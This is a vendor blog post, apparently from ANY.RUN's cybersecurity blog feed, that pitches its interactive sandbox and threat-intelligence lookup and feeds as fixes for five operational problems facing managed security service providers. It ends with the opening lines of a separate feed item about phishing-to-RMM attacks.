<p>Leading a managed security services provider has never been a comfortable job.&nbsp;And it&nbsp;isn’t&nbsp;now, though the&nbsp;demand for MSSPs has never been higher. The global threat landscape is expanding faster than most enterprise security teams can keep pace with, and organizations across every sector are turning to managed providers to fill the gap.&nbsp;&nbsp;</p>



<p>For MSSP leaders, this looks like&nbsp;an opportunity. And it is. The problem is that seizing it costs more than it used to.&nbsp;</p>



<h2 class="wp-block-heading">Key Points&nbsp;</h2>



<ul class="wp-block-list">
<li><strong>Linear scaling kills margins. </strong> <br>Adding more clients traditionally requires proportionally more analysts, making profitable growth nearly impossible. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Alert noise is expensive.</strong> <br>Up to 70% of alerts are false positives that waste analyst time and inflate operational costs. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Context gaps slow everything down.</strong> <br>Disconnected tools force manual aggregation of data from multiple systems, delaying investigations. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Tool switching destroys efficiency.</strong> <br>Constant platform hopping increases turnaround time and contributes to missed SLAs. </li>
</ul>



<ul class="wp-block-list">
<li><strong>Standardization is essential for multi-client environments.</strong> <br>Every client being unique creates bespoke processes that do not scale and accelerate analyst burnout. </li>
</ul>



<ul class="wp-block-list">
<li><strong>ANY.RUN’s Threat Intelligence (</strong><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener"><strong>TI Lookup</strong></a><strong> + </strong><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener"><strong>TI Feeds</strong></a><strong>) and </strong><a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener"><strong>Interactive Sandbox</strong></a> work as an integrated infrastructure layer that reduces manual labor and improves unit economics. </li>
</ul>



<ul class="wp-block-list">
<li><strong>True scalability comes from automation and shared context.</strong> <br>MSSPs can serve more clients at higher quality without linear headcount increases, while lowering stress and turnover. </li>
</ul>



<h2 class="wp-block-heading">The quiet storm inside every MSSP&nbsp;</h2>



<p>Threat actors automate attacks at unprecedented speed, while client environments grow more complex and diverse. MSSP leaders face mounting pressure to deliver faster, deeper, and more reliable protection across dozens or hundreds of customers:&nbsp;all while keeping margins healthy and SLAs intact.&nbsp;</p>



<ul class="wp-block-list">
<li>More clients still often means more analysts; </li>



<li>More alerts still means more noise; </li>



<li>More data still doesn’t mean more clarity. </li>
</ul>



<p>Meanwhile, the analysts carrying&nbsp;the weight&nbsp;are burning out. Turnover in MSSP analyst roles is among the highest in the industry, creating a perpetual cycle of recruitment, onboarding, and knowledge loss that compounds every other problem.&nbsp;</p>



<p>MSSP leaders&nbsp;aren’t&nbsp;looking for “another feature.”&nbsp;They’re&nbsp;looking for something closer to&nbsp;an operational&nbsp;backbone. Something that reduces manual effort and improves unit economics without adding complexity.&nbsp;</p>



<h2 class="wp-block-heading">1. Linear Growth Equals Margin Death: The Scalability Trap&nbsp;</h2>



<p>For many MSSPs, growth is a paradox: every new client increases revenue — but also operational cost at nearly the same rate. Hiring, training, and retaining talent is expensive and painful, with turnover creating constant friction. The more manual the work your analysts do per client, the harder it is to decouple revenue from headcount.  </p>



<p>Your revenue line and your cost line climb together, and the margin in between never quite widens the way a growth business should. </p>



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>The <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a> directly attacks the cost-per-investigation problem by compressing deep malware analysis from hours to minutes and speeding up triage, so each analyst can handle significantly more cases without sacrificing quality or output depth. <br> <br>To see how the Sandbox <a href="https://any.run/cybersecurity-blog/automated-interactivity/" target="_blank" rel="noreferrer noopener">automatically interacts</a> with malware detonating the kill chain elements and eliminating the need for manual interventions for a malware analyst, <a href="https://app.any.run/tasks/4dbbd0c5-7941-4729-b91e-1ce420728ede/" target="_blank" rel="noreferrer noopener">view an analysis session</a>:</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="504" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-1024x504.png" alt="" class="wp-image-20599" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-1024x504.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-300x148.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-768x378.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-1536x756.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-370x182.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-270x133.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1-740x364.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_1.png 1848w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Sandbox analysis with automated CAPTCHA pass and QR link follow</em> </figcaption></figure>



<p><a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Lookup</a>&nbsp;removes&nbsp;repetitive investigation steps by providing instant access to previously analyzed artifacts, indicators, and behaviors.&nbsp;It&nbsp;supports&nbsp;quick search across a&nbsp;huge database of contextual&nbsp;data on&nbsp;indicators&nbsp;and&nbsp;attacks&nbsp;drawn from sandbox investigations of over 15K SOC teams&nbsp;that are&nbsp;using ANY.RUN.&nbsp;&nbsp;</p>



<p>Together, these solutions&nbsp;shift effort from linear human scaling to&nbsp;knowledge&nbsp;reuse and automation. Analysts spend less time rebuilding context and more time making decisions.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="451" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-1024x451.png" alt="" class="wp-image-20600" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-1024x451.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-300x132.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-768x339.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-1536x677.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-370x163.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-270x119.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2-740x326.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_2.png 1624w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>ANY.RUN operational and business impact </em></figcaption></figure>



<h2 class="wp-block-heading">2.&nbsp;Alert Noise Equals Wasted Money&nbsp;</h2>



<p>With up to 70% of alerts&nbsp;representing&nbsp;noise, MSSPs burn resources investigating false positives. Every unnecessary alert translates into extra analyst time, higher operational costs, and increased risk of missing genuine threats amid the fatigue.&nbsp;</p>



<p>The downstream effects compound quickly. Analysts fatigued by noise start to triage faster and less carefully. Real threats&nbsp;get&nbsp;downgraded. Critical detections get buried under the volume. The service quality the MSSP is paid to deliver degrades — quietly, then suddenly.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
Improve triage accuracy. <br>
Reduce false positives to protect both <span class="highlight">your margins and your analysts’ time.<br></span></p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign=+mssp-pains-solved-by-ti&#038;utm_term=290426&#038;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Try ANY.RUN
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>ANY.RUN Threat Intelligence —&nbsp;comprising&nbsp;TI Lookup and&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>&nbsp;— puts a verification and enrichment layer in front of the analyst queue, so that the 70% that&nbsp;doesn&#8217;t&nbsp;matter gets filtered before it consumes investigation resources, and the 30% that does matter arrives with actionable context.&nbsp;</p>



<ul class="wp-block-list">
<li>Cuts false positive handling time; </li>



<li>Raises triage confidence; </li>



<li>Reduces analyst fatigue across multi-client environments; </li>



<li>Feeds directly into SIEM and SOAR workflows. </li>
</ul>



<p>TI Lookup provides on-demand, deep queries across a continuously updated database of threats, allowing an analyst to&nbsp;determine&nbsp;in seconds whether a suspicious IP, domain, file hash, or URL is genuinely malicious, benign, or requires deeper analysis.&nbsp;</p>



<p><a href="https://intelligence.any.run/analysis/lookup?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktolookup/#%7B%2522query%2522:%2522destinationIP:%255C%2522103.224.212.211%255C%2522%2522,%2522dateRange%2522:180%7D" target="_blank" rel="noreferrer noopener">destinationIP:&#8221;103.224.212.211&#8243;</a> </p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="564" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-1024x564.png" alt="" class="wp-image-20612" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-1024x564.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-300x165.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-768x423.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-1536x846.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-370x204.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-270x149.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3-740x408.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_3.png 1557w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>IP check in TI Lookup with a “malicious” verdict, additional IOCs, and sandbox analyses</em></figcaption></figure>



<p>TI Feeds deliver structured, high-fidelity threat data enriched with behavioral context that integrates directly into SIEM and SOAR workflows.&nbsp;&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="576" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-1024x576.png" alt="" class="wp-image-20613" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-1024x576.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-300x169.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-768x432.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-1536x864.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-370x208.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-270x152.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4-740x416.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_4.png 1920w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>TI Feeds integration capabilities</em></figcaption></figure>



<p>Instead of raw indicator lists that require manual validation, analysts receive intelligence that has already been correlated with real-world malware behavior&nbsp;observed&nbsp;in the Sandbox. The noise&nbsp;doesn&#8217;t&nbsp;just get filtered; it gets explained. Analysts spend time on what matters, and triage decisions become faster and more defensible.&nbsp;</p>



<h2 class="wp-block-heading">3.&nbsp;Missing Context: The Manual Puzzle Problem&nbsp;</h2>



<p>An MSSP&nbsp;analyst’s&nbsp;work happens across a fractured landscape. Threat intelligence feeds live in one place. SIEM alerts in another. Endpoint telemetry in a third. Sandboxing results in a fourth. An analyst responding to an incident&nbsp;doesn&#8217;t&nbsp;get the full picture handed to them. They construct it, manually, by pulling data from multiple sources, correlating it in their head or in a spreadsheet, and hoping nothing slips through the cracks.&nbsp;</p>



<p>This manual context assembly is slow, error-prone, and analyst-dependent.&nbsp;Investigations that should take minutes&nbsp;take&nbsp;hours. And in a threat landscape where speed matters, fragmented context is a liability that&nbsp;shows up in&nbsp;missed detections and broken SLAs.&nbsp;</p>



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>ANY.RUN collapses the distance between intelligence and action by delivering investigation context as a connected&nbsp;whole, giving&nbsp;MSSPs faster incident resolution, less analyst-dependent knowledge, and investigation outputs that hold their value even when team composition changes.&nbsp;</p>



<ul class="wp-block-list">
<li>Eliminates manual context assembly; </li>



<li>Connects intelligence to behavior; </li>



<li>Reduces investigation time per incident. </li>
</ul>



<p>ANY.RUN’s&nbsp;modules&nbsp;are designed for seamless integration and context sharing. The Interactive Sandbox delivers comprehensive behavioral data in one place:&nbsp;processes, network activity, MITRE ATT&amp;CK mappings, and more. TI Lookup instantly correlates any indicator (IOC, IOA, or IOB) with related threats, full attack chains, and supporting sandbox reports. TI Feeds extend this intelligence across the entire stack, feeding enriched data into existing workflows.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="319" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-1024x319.png" alt="" class="wp-image-20619" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-1024x319.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-300x93.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-768x239.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-370x115.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-270x84.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5-740x230.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_5.png 1144w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>The impact of ANY.RUN’s solution on MSSP processes</em></figcaption></figure>



<p>Analysts no longer “build the picture manually.” They access unified, actionable intelligence that accelerates triage, investigation, and reporting across all clients, reducing context gaps and enabling consistent, high-quality outcomes.&nbsp;The investigation pipeline becomes a connected workflow rather than a manual collage.&nbsp;</p>



<h2 class="wp-block-heading">4. Tool-Switching:&nbsp;The Hidden Time Tax&nbsp;</h2>



<p>Constantly jumping between platforms kills efficiency and extends turnaround times. Analysts lose momentum with every tab switch, every login, and every manual data transfer,&nbsp;directly&nbsp;impacting&nbsp;SLA compliance and team morale.&nbsp;</p>



<p>When tools are slow, unreliable, or disconnected, analysts route around them. They rely on memory, on&nbsp;informal knowledge-sharing, on&nbsp;workarounds.&nbsp;All of&nbsp;it&nbsp;introduces&nbsp;inconsistency and risk.&nbsp;</p>



<h3 class="wp-block-heading">How ANY.RUN Helps&nbsp;</h3>



<p>ANY.RUN&#8217;s API-first architecture is built to disappear into the workflows analysts already use, surfacing intelligence in the context where work is happening, rather than requiring analysts to pivot toward it. The result is less friction, higher adoption, and more consistent&nbsp;investigation&nbsp;quality across the team.&nbsp;<br>&nbsp;<br>TI Lookup and TI Feeds can be embedded directly into SIEM, SOAR, and ticketing environments, so analysts can surface intelligence without leaving the context&nbsp;they&#8217;re&nbsp;already working in.&nbsp;The&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>&nbsp;can be invoked as part of an automated or semi-automated investigation pipeline, with&nbsp;results returned&nbsp;in structured, machine-readable formats that feed directly into case management.&nbsp;</p>



<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="574" src="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-1024x574.png" alt="" class="wp-image-20620" srcset="https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-1024x574.png 1024w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-300x168.png 300w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-768x430.png 768w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-1536x861.png 1536w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-370x207.png 370w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-270x151.png 270w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6-740x415.png 740w, https://any.run/cybersecurity-blog/wp-content/uploads/2026/04/pains_6.png 1761w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Reports accessible in the Sandbox</em></figcaption></figure>



<p>The goal is to make ANY.RUN invisible in the best sense: present at every stage of investigation, without requiring analysts to pivot their attention toward it.&nbsp;</p>



<!-- Regular Banner START -->
<div class="regular-banner">
<!-- Text Content -->
<p class="regular-banner__text">
<span class="highlight">Stop scaling pain and start scaling profit.<br></span>
Check how ANY.RUN Intelligence fits your workflows. <br>
</p>
<!-- CTA Link -->
<a class="regular-banner__link" id="article-banner-regular" href="https://any.run/mssp/?utm_source=anyrunblog&#038;utm_medium=article&#038;utm_campaign= mssp-pains-solved-by-ti&#038;utm_term=290426&#038;utm_content=linktomssp#contact-sales" rel="noopener" target="_blank">
Contact sales
</a>
</div>
<!-- Regular Banner END -->
<!-- Regular Banner Styles START -->

<style>
.regular-banner {
display: flex;
text-align: center;
flex-direction: column;
align-items: center;
gap: 1.5rem;
width: 100%;
padding: 2rem;
margin: 1.5rem 0;
border-radius: 0.5rem;
font-family: 'Catamaran Bold';
margin-inline: auto;
background: rgba(32, 168, 241, 0.1);
border: 1px solid rgba(75, 174, 227, 0.32);
}

.regular-banner__text {
font-size: 1.5rem;
margin: 0;
}

.highlight {
color: #ea2526;
}

.regular-banner__link {
padding: 0.5rem 1.5rem;
font-weight: 500;
text-decoration: none;
border-radius: 0.5rem;
color: #FFFFFF;
background-color: #1491D4;
text-align: center;
transition: all 0.2s ease-in;
}

.regular-banner__link:hover {
background-color: #68CBFF;
color: white;
}
</style>
<!-- Regular Banner Styles END -->



<h2 class="wp-block-heading">5.&nbsp;No Standardization — Scaling Chaos Across Clients&nbsp;</h2>



<p>No two MSSP clients are alike. One runs a legacy on-premises environment with minimal telemetry. Another is cloud-native with dozens of SaaS integrations. A third has custom applications, bespoke logging configurations, and a security team with strong opinions about how investigations should be documented. For the MSSP trying to serve all three, the challenge&nbsp;isn&#8217;t&nbsp;just operational:&nbsp;it&#8217;s&nbsp;structural.&nbsp;</p>



<p>When client environments are siloed, institutional knowledge about one&nbsp;doesn&#8217;t&nbsp;transfer to another. When investigation workflows differ by engagement, onboarding new analysts takes&nbsp;longer,&nbsp;errors are harder to catch, and QA becomes a guessing game. What scales, in the absence of standardization, is chaos. And chaos&nbsp;has&nbsp;a&nbsp;cost.&nbsp;</p>



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>ANY.RUN Threat Intelligence was built with multi-tenant MSSP operations in mind.&nbsp;</p>



<ul class="wp-block-list">
<li>Normalizes intelligence across client environments; </li>



<li>Gives analysts a single investigative interface; </li>



<li>Standardizes investigation outputs; </li>



<li>Shortens analyst onboarding. </li>
</ul>



<p><a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a> deliver structured, consistently formatted intelligence that can be normalized and applied across client environments without per-client customization of the data layer.  </p>



<p>TI Lookup gives analysts a single&nbsp;investigative interface regardless of which client environment&nbsp;they&#8217;re&nbsp;working in. And the Interactive Sandbox produces structured, reproducible analysis outputs — process trees, network maps, MITRE mappings, IOC exports — that can be templated into client-specific reporting workflows without requiring analysts to rebuild their investigation approach from scratch each time.&nbsp;</p>



<p>Standardization&nbsp;doesn&#8217;t&nbsp;mean treating every client the same. It means having a consistent intelligence layer beneath the client-specific details,&nbsp;so that quality&nbsp;and&nbsp;speed hold constant even as the client roster grows.&nbsp;</p>



<h2 class="wp-block-heading">Analyst burnout (the pain that amplifies all others)&nbsp;</h2>



<p>When systems&nbsp;don’t&nbsp;scale, people absorb the pressure.&nbsp;Overload, repetitive work, constant alert fatigue&nbsp;—&nbsp;this is where everything converges.&nbsp;</p>



<p>Burnout&nbsp;isn’t&nbsp;just a&nbsp;people&nbsp;problem.&nbsp;It’s&nbsp;an operational risk:&nbsp;</p>



<ul class="wp-block-list">
<li>Higher turnover; </li>



<li>Knowledge loss </li>



<li>Reduced investigation quality </li>
</ul>



<h3 class="wp-block-heading">How ANY.RUN helps&nbsp;</h3>



<p>By reducing noise, minimizing manual work, and accelerating investigations, the combined capabilities of&nbsp;<a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>,&nbsp;<a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and&nbsp;<a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">TI Feeds</a>&nbsp;directly lower cognitive and operational pressure.&nbsp;Analysts move from reactive overload to structured, efficient workflows.&nbsp;</p>



<h2 class="wp-block-heading">Conclusion: What MSSPs Are Actually Looking For&nbsp;</h2>



<p>The pains above are not independent problems. They are interconnected symptoms of the same underlying condition: MSSP operations that have scaled their client load without scaling the intelligence infrastructure underneath it.&nbsp;</p>



<p>MSSPs&nbsp;don’t&nbsp;need more isolated features. They need:&nbsp;</p>



<ul class="wp-block-list">
<li>Less manual aggregation; </li>



<li>Less switching; </li>



<li>More context, faster; </li>



<li>Reliable, always-available capabilities; </li>



<li>Infrastructure that improves margins, not just performance. </li>
</ul>



<p>When&nbsp;Threat Intelligence Lookup&nbsp;and&nbsp;Threat Intelligence&nbsp;Feeds&nbsp;operate&nbsp;as a unified threat intelligence layer, and&nbsp;Interactive Sandbox&nbsp;feeds it with fresh behavioral data, the result&nbsp;isn’t&nbsp;just efficiency.&nbsp;It’s&nbsp;a shift in how MSSPs operate:&nbsp;<strong>from effort-heavy scaling to intelligence-driven scaling.&nbsp;</strong>&nbsp;</p>



<h2 class="wp-block-heading">About ANY.RUN</h2>



<p><a href="https://any.run/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktolanding" target="_blank" rel="noreferrer noopener">ANY.RUN</a>, a leading provider of interactive malware analysis and threat intelligence solutions, helps security teams investigate threats faster and with greater clarity across modern enterprise environments.   </p>



<p>It allows teams to safely execute suspicious files and URLs, observe real behavior in an <a href="https://any.run/features/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktosandboxlanding" target="_blank" rel="noreferrer noopener">Interactive Sandbox</a>, enrich indicators with immediate context through <a href="https://any.run/threat-intelligence-lookup/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotilookuplanding" target="_blank" rel="noreferrer noopener">TI Lookup</a>, and monitor emerging malicious infrastructure using <a href="https://any.run/threat-intelligence-feeds/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktotifeedslanding" target="_blank" rel="noreferrer noopener">Threat Intelligence Feeds</a>. Together, these capabilities help reduce investigation uncertainty, accelerate triage, and limit unnecessary escalations across the SOC.   </p>



<p>ANY.RUN is trusted by thousands of organizations worldwide and meets enterprise security and compliance expectations. It is <a href="https://any.run/compliance/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=mssp-pains-solved-by-ti&amp;utm_term=290426&amp;utm_content=linktocompliance" target="_blank" rel="noreferrer noopener">SOC 2 Type II certified</a>, demonstrating its commitment to protecting customer data and maintaining strong security controls. </p>



<h2 class="wp-block-heading">FAQ</h2>



<div class="schema-faq wp-block-yoast-faq-block"><div class="schema-faq-section" id="faq-question-1777447484330"><strong class="schema-faq-question">What are the main operational challenges facing MSSP leaders today?</strong> <p class="schema-faq-answer">The biggest pains include linear headcount scaling, high alert noise (up to 70%), missing context, constant tool switching, lack of standardization across clients, and resulting analyst burnout and turnover.</p> </div> <div class="schema-faq-section" id="faq-question-1777447592029"><strong class="schema-faq-question">How does ANY.RUN help MSSPs scale without proportionally increasing staff?</strong> <p class="schema-faq-answer">By combining Threat Intelligence and the Interactive Sandbox, ANY.RUN dramatically reduces time spent on triage and investigation, allowing the same team to handle more clients effectively while maintaining or improving service quality.</p> </div> <div class="schema-faq-section" id="faq-question-1777447607588"><strong class="schema-faq-question">Can ANY.RUN reduce alert fatigue?</strong> <p class="schema-faq-answer">Yes. TI Feeds deliver high-confidence, low-noise IOCs, while TI Lookup and Sandbox analysis provide rapid behavioral context that helps filter genuine threats from noise.</p> </div> <div class="schema-faq-section" id="faq-question-1777447621052"><strong class="schema-faq-question">How does ANY.RUN solve the problem of missing context?</strong> <p class="schema-faq-answer">The Interactive Sandbox reveals full attack behavior, and TI Lookup instantly correlates indicators with rich, real-world intelligence — all in one integrated workflow instead of manual collection across tools.</p> </div> <div class="schema-faq-section" id="faq-question-1777447636683"><strong class="schema-faq-question">Is ANY.RUN suitable for multi-tenant MSSP environments?</strong> <p class="schema-faq-answer">Yes. It supports strong client isolation and centralized management, replacing manual separation processes with reliable, scalable infrastructure.</p> </div> <div class="schema-faq-section" id="faq-question-1777447648971"><strong class="schema-faq-question">How fast is analysis with ANY.RUN?</strong> <p class="schema-faq-answer">The Interactive Sandbox and Threat Intelligence deliver quick turnaround times, often in seconds to minutes, helping MSSPs comfortably meet aggressive SLAs (typically ~1 hour for initial analysis).</p> </div> <div class="schema-faq-section" id="faq-question-1777447661661"><strong class="schema-faq-question"></strong> <p class="schema-faq-answer"></p> </div> </div>
<p>The post <a rel="nofollow" href="https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/">Margin vs. Madness: Fixing MSSP Top 5 Operational Nightmares</a> appeared first on <a rel="nofollow" href="https://any.run/cybersecurity-blog">ANY.RUN&#039;s Cybersecurity Blog</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://any.run/cybersecurity-blog/mssp-pains-solved-by-ti/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Phishing-to-RMM Attacks: The Remote Access Blind Spot CISOs Can’t Ignore </title>
		<link>https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/</link>
					<comments>https://any.run/cybersecurity-blog/rmm-blind-spot-for-cisos/#respond</comments>
		
		<dc:creator><![CDATA[GridGuardGhoul]]></dc:creator>
		<pubDate>Tue, 28 Apr 2026 12:01:34 +0000</pubDate>
				<category><![CDATA[Malware Analysis]]></category>
		<category><![CDATA[ANYRUN]]></category>
		<category><![CDATA[cybersecurity]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">https://any.run/cybersecurity-blog/?p=20522</guid>

					<description><![CDATA[<p>CISOs are under pressure to prove that their security programs can detect threats early, reduce business risk, and support fast, confident response. But that becomes harder when attackers stop relying on obviously malicious tools. In recent phishing-to-RMM campaigns observed by ANY.RUN analysts, threat actors are using fake Microsoft, Adobe, and OneDrive pages to deliver legitimate [&#8230;]</p>
